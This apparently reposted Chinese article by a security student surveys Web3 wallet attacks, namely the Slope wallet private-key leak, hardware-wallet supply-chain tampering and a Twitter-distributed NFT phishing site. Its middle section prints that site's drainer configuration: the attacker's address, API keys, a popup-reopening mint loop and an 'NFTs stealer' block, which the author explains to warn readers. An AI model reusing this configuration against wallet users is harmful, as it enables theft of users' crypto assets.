网络安全检测|网络安全服务|网络安全扫描-香港墨客投资移动版

　　不管该钱包是新创建的，还是用户导入的，其私钥都会被发送至Slope钱包服务器处保存

　　软硬件钱包供应链攻击分析及安全建议

　　私钥丢失了，资产就不受用户控制了，只是缺少一个触发的盗窃动作的时间点。在Slope钱包攻击案例中：不管该钱包是新创建的，还是用户导入的，其私钥都会被发送至Slope钱包服务器处保存。

　　硬件钱包的供应链攻击也是一样的，半路被人调换一个一模一样的钱包，但固件已被人篡改的可能性同样存在。

　　针对上述安全攻击给出的安全建议如下：

　　这应该是本文的最后一个案例，是日常遇到的一个很有意思的钓鱼，攻击者先通过推特分发了一个钓鱼链接，进去之后就会弹窗要连钱包，随后请求授权，简单看了一下站点的源代码。

　　钓鱼站点后台配置逻辑

　　const address = “0x6261B75c1087198BE93F83D09DF404d8709843Db”；    // Your wallet that you have to receive NFTsconst infuraId = “8c15147b9b1c4498b7b7a260e437058a”     // Infuria ID | https：//infura.io/ | For Wallet Connectconst moralisApi = “xiJfIKNXA5OQAXBle0xgdc5OXnYvWUZBRly8lDMV0UzlSVDhQaKfnodZkRyOssqH”    // x-api-key | https：//moralis.io/ | For NFTs

　　const collectionInfo = {    name： “NFTs GIVEAWAY”，    title： “THE STICKMAN TOY”， // Title prefix （ex “Buy your {name}”） - You can use {name} to insert the collection name    date： “30.07.2022”，    socialMedia： {        discord： “https：//discord.gg/example”，        twitter： “https：//twitter.com/example”，    }，    medias： {        preview： “preview.gif”，        favicon： “logo.png”，    }，    background： {        type： “image”，              // Supported types： image， video， color        image： “background.jpg”，    // Image for image type， video preview for video type        video： “background.mp4”，    // If you don‘t use video， you can ignore this line        color： “#4E4E6D”，           // If you don’t use color， you can ignore this line    }}const mintInfo = {    price： 0.02，         // Price per NFT．    totalSupply： 999，   // Total supply of NFTs．    minUnits： 1，        // Min units to buy．    maxUnits： 10，        // Max units to buy．    askMintLoop： true，  // If true， when the user closes the metamask popup， it reopens automatically．}

　　const nftsInfo = {    active： true，   // Active （true） or not （false） NFTs stealer．    minValue： 0.1，  // Minimum value of the last transactions （in the last ‘checkMaxDay’ days） of the collection．    checkMaxDay： 7， // Maximum number of days to check for the last transactions．    receiveAddress： “” // leave empty if you want to use the same address }

　　/*     = = = = = END OF SETTINGS = = = = =*/

　　//#region Check Configurationif （mintInfo.minUnits > mintInfo.maxUnits） console.error（`Error： minUnits （${mintInfo.minUnits}） is greater than maxUnits （${maxUnits}）`）；if （mintInfo.minUnits <= 0） console.error（`Error： minUnits （${mintInfo.minUnits}） is less than or equal to 0`）；

　　if （！address.startsWith（“0x”） ||    （        address.length >= 64 ||        address.length <= 40    ）） console.error（`Error： ${address} is not a valid Ethereum address．`）；//#endregion

　　该站点有两种盗取用户数字资产的业务逻辑：

　　1）以0.02ETH的价格销售NFT，但支付的0.02ETH会直接通过转账打入黑客账户；

　　2）检测已连接钱包内持有的NFT资产，一旦该NFT在最近7天内的最低交易价格大于0.1ETH，即诱导用户授权攻击者账户具备转账对应NFT的权限，在授权后将NFT转移至攻击者账户并变现。

　　编写本文的缘由来自SeeDao投研工会的一次讨论，舟舟当时提出了一个在2.2.2中介绍的钓鱼攻击怎么实施的问题及为何会成功的原因：正巧我最近在总结整理相关的案例，在日常使用中也遇到了一些通过这类方式实施的钓鱼攻击，就结合自己的理解做了解答。大家后续讨论了下，认为很有必要整理一篇相关的攻击手段及安全建议，供大家进行参考，这便是此篇文章产生的原因。在这里也要特别感谢SeeDao及舟舟的提议。

　　利用区块链网络实施钓鱼欺骗及诈骗类的攻击越来越多，各类攻击手段层出不穷。追本溯源，很多钓鱼攻击其实是通过简单的攻击进行组合后实施的，通过利用用户着急参与活动、希望通过Web3赚取更多利润等心理向用户实施攻击。

　　在这篇文章中所阐述的攻击案例，基本上都是我及一些Web3的深度参与用户日常遇到的，素材全部是自己截图及使用的，希望大家能够尊重原创。为了这篇文章的出炉，我写了两天时间，但素材的积累和整理花费了超过2个月的时间，本来希望以另一种形式与大家见面（可能是论文），但是发现该类文章的实践性偏强，时效性不适合在论文中发表。但未来我也会仍然持续的探索，用更加通用的方式发表相关的内容。此文中参考他人的内容，基本都已通过外链的方式放入，也特别感谢相关作者在构建更加安全的Web3使用环境所做出的努力。

　　作为一名网络安全专业的学生，我也深感荣幸和责任，掌握屠龙刀法应该让我们更好的惩恶扬善，即使没有惩恶的能力（至少我这菜鸡没有），但把已有的攻击案例总结归纳，让大家有一颗防范之心，应该能在一定程度上减少受害者的损失及受害几率。就像Nice discord钓鱼的那次，我也在群里拦住了很多访问目标站点的网友，我想一定程度上减少了他们的损失，这样大家都很开心。安全的研究和防护往往需要从一件小事做起，才能支撑已经发展了多年还在持续发展的链上系统。

　　编写这篇文章离不开身边朋友的支持，谢谢豆子，w33d，yzbban，Heisenberg，SeeDao安全学习小组的群友们，Inkepass群友们，LookmeDao的群友们以及老白链游群的群友们。

　　由于时间匆忙，加上自己研究还不够透彻，有些内容并没有完全展开或存在纰漏，还请各位批评指正。大家随时可以在SeeDao投研工会联系我，期待大家的意见和建议。

海量资讯、精准解读，尽在新浪财经APP